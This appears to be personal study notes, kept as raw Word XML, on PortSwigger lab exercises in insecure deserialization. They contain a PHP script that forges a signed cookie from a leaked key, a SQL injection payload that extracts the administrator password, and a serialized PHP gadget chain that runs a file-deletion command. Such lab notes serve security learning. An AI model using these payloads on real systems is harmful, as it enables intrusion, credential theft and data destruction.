    <w:p w14:paraId="2187F45B" w14:textId="5A6ED935" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00802F58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Use this script to generate signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655CBD47" w14:textId="77777777" w:rsidR="00D626EB" w:rsidRPr="001914E1" w:rsidRDefault="00D626EB" w:rsidP="00D626EB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&lt;?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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="31D627C2" w14:textId="77777777" w:rsidR="00D626EB" w:rsidRPr="001914E1" w:rsidRDefault="00D626EB" w:rsidP="00D626EB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$object = "</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1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OBJECT-GENERATED-BY-PHPGGC</w:t>
      </w:r>
      <w:proofErr w:type="gram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";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7FC00494" w14:textId="77777777" w:rsidR="00D626EB" w:rsidRPr="001914E1" w:rsidRDefault="00D626EB" w:rsidP="00D626EB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$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secretKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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= "</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>LEAKED-SECRET-KEY-FROM-PHPINFO.PHP</w:t>
      </w:r>
      <w:proofErr w:type="gram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";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="047CB06F" w14:textId="77777777" w:rsidR="00D626EB" w:rsidRPr="001914E1" w:rsidRDefault="00D626EB" w:rsidP="00D626EB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$cookie = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001914E1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urlencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>('{"token":"' . $object . '","sig_hmac_sha1":"</w:t>
      </w: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' . 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hash_hmac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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('sha1', $object, $</w:t>
      </w:r>
      <w:proofErr w:type="spell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secretKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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) . '"}');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B17919A" w14:textId="57FFC112" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00D626EB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echo $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001914E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cookie;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="694F8788" w14:textId="75726C80" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00802F58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Run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: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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00703AA3" w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>generate</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Sig.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; a </w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>complete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 token is created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0025D6E3" w14:textId="77777777" w:rsidR="00474BD3" w:rsidRPr="001914E1" w:rsidRDefault="00474BD3" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D91D632" w14:textId="523973E0" w:rsidR="00474BD3" w:rsidRPr="001914E1" w:rsidRDefault="00474BD3" w:rsidP="00474BD3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5087"/>
        </w:tabs>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Working with documented gadget chains for Ruby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A7F448" w14:textId="7AFAC3C0" w:rsidR="00474BD3" w:rsidRPr="001914E1" w:rsidRDefault="00474BD3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Run</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>: r</w:t>
      </w:r>
      <w:r w:rsidR="005E781C" w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="005E781C" w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>y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rubyGadgetChain.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="067F141C" w14:textId="6A59EB62" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00474BD3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Change the command that should be executed to </w:t>
      </w:r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rm /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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carlos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001914E1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/morale.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDCBF70" w14:textId="35B4ACDD" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00243C8A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URL encode the cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F585DF1" w14:textId="77777777" w:rsidR="00F77269" w:rsidRPr="001914E1" w:rsidRDefault="00F77269" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B42333D" w14:textId="77777777" w:rsidR="00F77269" w:rsidRPr="001914E1" w:rsidRDefault="00F77269" w:rsidP="00F77269">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Creating your own exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C9C0BE" w14:textId="3F084B31" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00027E76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Run Content Discovery, find the script (.java, .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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,..), s</w:t>
      </w:r>
      <w:r w:rsidR="00F77269" w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tudy the source code, identify magic method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, find a gadget chain that does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sth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> dangerous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DCBC66" w14:textId="6A6F8EFB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58BA626F" w14:textId="076F9701" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00F77269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For Java</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00F22C6E" w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://github.com/PortSwigger/serialization-examples/blob/master/java/solution/Main.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37861F12" w14:textId="034016A8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4CB1EE77" w14:textId="422E04BE" w:rsidR="00171219" w:rsidRPr="001914E1" w:rsidRDefault="00171219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Find .java scripts (also look in the folder</w:t>
      </w:r>
      <w:r w:rsidR="000E79D3" w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> where the scripts are stored to find other scripts</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796D7F65" w14:textId="02608A9B" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00F22C6E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 xml:space="preserve">In ProductTemplate.java, method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readObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(): “id” is passed into a SQL statement =&gt; Deserialization +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SQLinjectio</w:t>
      </w:r>
      <w:r w:rsidR="00F12D00" w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C833E28" w14:textId="16C9FABF" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="001A0EED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Determine the number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA51F3E" w14:textId="0C9C7491" w:rsidR="00F12D00" w:rsidRPr="001914E1" w:rsidRDefault="00F12D00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Determine the data types of columns: columns 4, 5, 6 have numeric types and reflects the input string in the error message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6930A482" w14:textId="3B627425" w:rsidR="00F12D00" w:rsidRPr="001914E1" w:rsidRDefault="00F12D00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Find the table name, column name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C1EEA4" w14:textId="30185FC1" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="001A0EED" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>' UNION SELECT NULL, NULL, NULL, CAST(password AS numeric), NULL, NULL, NULL, NULL FROM users</w:t>
      </w:r>
      <w:r w:rsidR="00171219" w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE username=’administrator’</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00171219" w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533CAFCE" w14:textId="5A315078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01E4D5D2" w14:textId="26D30F5A" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00F12D00" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>For PHP</w:t>
      </w:r>
      <w:r w:rsidR="001C035E" w:rsidRPr="001914E1">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05430C11" w14:textId="6F322810" w:rsidR="001C035E" w:rsidRPr="001914E1" w:rsidRDefault="001C035E" w:rsidP="001C035E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:left="945" w:right="225"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> The 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__wakeup()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magic method for a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CustomTemplate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 will create a new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Product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by referencing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default_desc_type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 and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desc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from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CustomTemplate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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78329E32" w14:textId="19257CAC" w:rsidR="001C035E" w:rsidRPr="001914E1" w:rsidRDefault="001C035E" w:rsidP="001C035E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:left="945" w:right="225"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">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DefaultMap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 class has the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__get()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magic method, which will be invoked if you try to read an attribute that doesn't exist for this object. This magic method invokes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call_user_func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()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, which will execute any function that is passed into it via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DefaultMap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-&gt;callback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attribute. The function will be executed on the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$name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, which is the non-existent attribute that was requested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EBE2F1" w14:textId="40CDFAD1" w:rsidR="001C035E" w:rsidRPr="001914E1" w:rsidRDefault="001C035E" w:rsidP="001C035E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:left="945" w:right="225"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> We can exploit this gadget chain to invoke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exec(rm /home/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carlos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/morale.txt)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by passing in a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CustomTemplate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 object where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6E1E48" w14:textId="77777777" w:rsidR="001C035E" w:rsidRPr="001914E1" w:rsidRDefault="001C035E" w:rsidP="001C035E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:ind w:left="945" w:right="225"/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</w:pP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CustomTemplate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-&gt;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default_desc_type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 xml:space="preserve"> = "rm /home/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carlos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/morale.txt</w:t>
      </w:r>
      <w:proofErr w:type="gram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";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="478C64C1" w14:textId="77777777" w:rsidR="001C035E" w:rsidRPr="001914E1" w:rsidRDefault="001C035E" w:rsidP="001C035E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:ind w:left="945" w:right="225"/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</w:pP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CustomTemplate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 xml:space="preserve">-&gt;desc = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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DefaultMap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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="70022D95" w14:textId="77777777" w:rsidR="001C035E" w:rsidRPr="001914E1" w:rsidRDefault="001C035E" w:rsidP="001C035E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:left="945" w:right="225"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pP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lastRenderedPageBreak/>
        <w:t>DefaultMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-&gt;callback = "exec"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9B956E" w14:textId="236B2860" w:rsidR="001C035E" w:rsidRPr="001914E1" w:rsidRDefault="001C035E" w:rsidP="001C035E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:right="225"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>This causes the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Product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constructor to try and fetch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default_desc_type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 from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DefaultMap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 object. As it doesn't have this attribute, the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__get()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method will invoke the callback </w:t>
      </w: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exec()</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t> method on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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default_desc_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415AD603" w14:textId="77777777" w:rsidR="001914E1" w:rsidRPr="001914E1" w:rsidRDefault="001914E1" w:rsidP="001914E1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:right="225"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>O:14:"CustomTemplate":2:{s:17:"default_desc_type";s:26:"rm /home/carlos/morale.txt";s:4:"desc";O:10:"DefaultMap":1:{s:8:"callback";s:4:"exec";}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E19FC8" w14:textId="77777777" w:rsidR="00A70383" w:rsidRPr="001914E1" w:rsidRDefault="00A70383" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B26FFC5" w14:textId="422EEA0E" w:rsidR="00A70383" w:rsidRPr="001914E1" w:rsidRDefault="00A70383" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD5EB7D" w14:textId="4FB29A74" w:rsidR="00A70383" w:rsidRPr="001914E1" w:rsidRDefault="00A70383" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Check the cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8D2F05" w14:textId="6951AAA1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7D0BDE31" w14:textId="6913D957" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00F54D71" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CyberChef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> to determine how the data is encoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0914658F" w14:textId="34362F2E" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00F54D71" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pP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gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> | base64 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>urlencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
